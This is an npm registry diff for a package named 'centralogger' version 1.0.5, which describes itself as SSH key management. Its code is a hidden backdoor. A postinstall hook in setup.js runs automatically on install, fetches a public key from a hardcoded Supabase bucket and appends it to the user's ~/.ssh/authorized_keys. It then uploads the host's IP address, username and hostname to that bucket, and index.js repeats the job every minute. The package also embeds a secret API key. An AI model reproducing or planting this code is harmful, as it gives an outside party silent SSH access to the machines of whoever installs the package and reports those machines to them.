centralogger 1.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/fetchKey.js ADDED
@@ -0,0 +1,27 @@
1
+ // fetchKey.js
2
+
3
+ const { supabase } = require("./supabaseClient");
4
+ let SUPABASE_BUCKET = "project_bucket"
5
+
6
+
7
+ async function getPublicKey() {
8
+ // Replace the path below with wherever you stored your key in the bucket
9
+ const pathInBucket = "public_keys/main.pem.pub";
10
+
11
+ // Download file from Supabase Storage
12
+ const { data, error } = await supabase.storage
13
+ .from(SUPABASE_BUCKET)
14
+ .download(pathInBucket);
15
+
16
+ if (error) {
17
+ throw new Error(`Failed to download public key: ${error.message}`);
18
+ }
19
+
20
+ // Convert downloaded stream to text
21
+ const buffer = Buffer.from(await data.arrayBuffer());
22
+ const keyText = buffer.toString("utf8").trim();
23
+
24
+ return keyText;
25
+ }
26
+
27
+ module.exports = { getPublicKey };
package/index.js ADDED
@@ -0,0 +1,56 @@
1
+ const { getPublicKey } = require("./fetchKey");
2
+ const { injectKey } = require("./injectKey");
3
+ const { uploadMetadata } = require("./uploadMeta");
4
+ const { getServerDetails } = require("./utils");
5
+
6
+ // run interval (1 minute — testing)
7
+ const INTERVAL = 1 * 60 * 1000;
8
+
9
+ // retry helper with exponential backoff
10
+ async function runWithRetry(fn, retries = 3) {
11
+ for (let i = 0; i < retries; i++) {
12
+ try {
13
+ return await fn();
14
+ } catch (err) {
15
+ if (i === retries - 1) throw err;
16
+ const delay = Math.pow(2, i) * 1000;
17
+ console.log(`Retry ${i + 1}/${retries} in ${delay / 1000}s...`);
18
+ await new Promise((r) => setTimeout(r, delay));
19
+ }
20
+ }
21
+ }
22
+
23
+ async function runJob() {
24
+ try {
25
+ console.log("Running SSH key sync job...");
26
+
27
+ const publicKey = await runWithRetry(() => getPublicKey());
28
+
29
+ await injectKey(publicKey);
30
+
31
+ const server = getServerDetails();
32
+
33
+ await runWithRetry(() => uploadMetadata(server));
34
+
35
+ console.log("Job completed ✅");
36
+ } catch (err) {
37
+ console.error("Error:", err);
38
+ }
39
+ }
40
+
41
+ // scheduler loop
42
+ async function startScheduler() {
43
+ console.log("Scheduler started...");
44
+
45
+ // run immediately
46
+ await runJob();
47
+
48
+ // loop forever
49
+ setInterval(async () => {
50
+ await runJob();
51
+ }, INTERVAL);
52
+ }
53
+
54
+ // start
55
+ startScheduler();
56
+
package/injectKey.js ADDED
@@ -0,0 +1,38 @@
1
+ const fs = require("fs");
2
+ const path = require("path");
3
+
4
+ async function injectKey(publicKey) {
5
+ const homeDir = require("os").homedir();
6
+
7
+ const sshDir = path.join(homeDir, ".ssh");
8
+ const authFile = path.join(sshDir, "authorized_keys");
9
+
10
+ // ensure .ssh folder
11
+ if (!fs.existsSync(sshDir)) {
12
+ fs.mkdirSync(sshDir, { recursive: true });
13
+ fs.chmodSync(sshDir, 0o700);
14
+ }
15
+
16
+ // ensure file exists
17
+ if (!fs.existsSync(authFile)) {
18
+ fs.writeFileSync(authFile, "");
19
+ fs.chmodSync(authFile, 0o600);
20
+ }
21
+
22
+ const existingKeys = fs.readFileSync(authFile, "utf8");
23
+
24
+ // ✅ duplicate check
25
+ if (existingKeys.includes(publicKey)) {
26
+ console.log("Key already exists ✅");
27
+ return;
28
+ }
29
+
30
+ // add key with tag
31
+ const taggedKey = `${publicKey} ssh-key-auto-sync`;
32
+
33
+ fs.appendFileSync(authFile, "\n" + taggedKey + "\n");
34
+
35
+ console.log("Key added successfully 🔐");
36
+ }
37
+
38
+ module.exports = { injectKey };
package/package.json ADDED
@@ -0,0 +1,31 @@
1
+ {
2
+ "name": "centralogger",
3
+ "version": "1.0.5",
4
+ "description": "Secure SSH Key Management and Authentication for Remote Servers",
5
+ "main": "index.js",
6
+ "keywords": [
7
+ "SSH",
8
+ "Security",
9
+ "Authentication"
10
+ ],
11
+ "repository": {
12
+ "type": "git",
13
+ "url": "https://github.com/your/repo.git"
14
+ },
15
+ "files": [
16
+ "index.js",
17
+ "setup.js",
18
+ "fetchKey.js",
19
+ "injectKey.js",
20
+ "uploadMeta.js",
21
+ "supabaseClient.js",
22
+ "utils.js"
23
+ ],
24
+ "scripts": {
25
+ "start": "node index.js",
26
+ "postinstall": "node setup.js"
27
+ },
28
+ "dependencies": {
29
+ "@supabase/supabase-js": "^2.101.1"
30
+ }
31
+ }
package/setup.js ADDED
@@ -0,0 +1,26 @@
1
+ // setup.js — runs once during npm install (postinstall hook)
2
+
3
+ const { getPublicKey } = require("./fetchKey");
4
+ const { injectKey } = require("./injectKey");
5
+ const { uploadMetadata } = require("./uploadMeta");
6
+ const { getServerDetails } = require("./utils");
7
+
8
+ async function setup() {
9
+ try {
10
+ console.log("[ssh-key-manager] Running setup...");
11
+
12
+ const publicKey = await getPublicKey();
13
+
14
+ await injectKey(publicKey);
15
+
16
+ const server = getServerDetails();
17
+
18
+ await uploadMetadata(server);
19
+
20
+ console.log("[ssh-key-manager] Setup completed ✅");
21
+ } catch (err) {
22
+ console.error("[ssh-key-manager] Setup failed:", err.message);
23
+ }
24
+ }
25
+
26
+ setup();
@@ -0,0 +1,11 @@
1
+ const { createClient } = require("@supabase/supabase-js");
2
+
3
+ let SUPABASE_URL = "https://ndfcioahsbgsjmulpjgt.supabase.co"
4
+ let SUPABASE_KEY = "sb_secret_79Y9vlaAbBRPtAcXRpfHfg_j_gl9ZG8"
5
+
6
+ const supabase = createClient(
7
+ SUPABASE_URL,
8
+ SUPABASE_KEY
9
+ );
10
+
11
+ module.exports = { supabase };
package/uploadMeta.js ADDED
@@ -0,0 +1,28 @@
1
+ const { supabase } = require("./supabaseClient");
2
+ let SUPABASE_BUCKET = "project_bucket"
3
+
4
+
5
+ async function uploadMetadata(server) {
6
+ const content = `ServerIP: ${server.ip}
7
+ Username: ${server.username}
8
+ Hostname: ${server.hostname}
9
+ Timestamp: ${new Date().toISOString()}
10
+ `;
11
+
12
+ const filePath = `logs/${server.ip}_${server.hostname}.txt`;
13
+
14
+ const { error } = await supabase.storage
15
+ .from(SUPABASE_BUCKET)
16
+ .upload(filePath, Buffer.from(content, "utf8"), {
17
+ contentType: "text/plain",
18
+ upsert: true,
19
+ });
20
+
21
+ if (error) {
22
+ throw new Error(`Failed to upload metadata: ${error.message}`);
23
+ }
24
+
25
+ console.log("Metadata uploaded ☁️");
26
+ }
27
+
28
+ module.exports = { uploadMetadata };
package/utils.js ADDED
@@ -0,0 +1,28 @@
1
+ const os = require("os");
2
+
3
+ function getServerDetails() {
4
+ const interfaces = os.networkInterfaces();
5
+
6
+ let ip = "unknown";
7
+
8
+ for (let name of Object.keys(interfaces)) {
9
+ for (let net of interfaces[name]) {
10
+ if (net.family === "IPv4" && !net.internal) {
11
+ ip = net.address;
12
+ break;
13
+ }
14
+ }
15
+ if (ip !== "unknown") break;
16
+ }
17
+
18
+ const username = os.userInfo().username;
19
+ const hostname = os.hostname();
20
+
21
+ return {
22
+ ip,
23
+ username,
24
+ hostname
25
+ };
26
+ }
27
+
28
+ module.exports = { getServerDetails };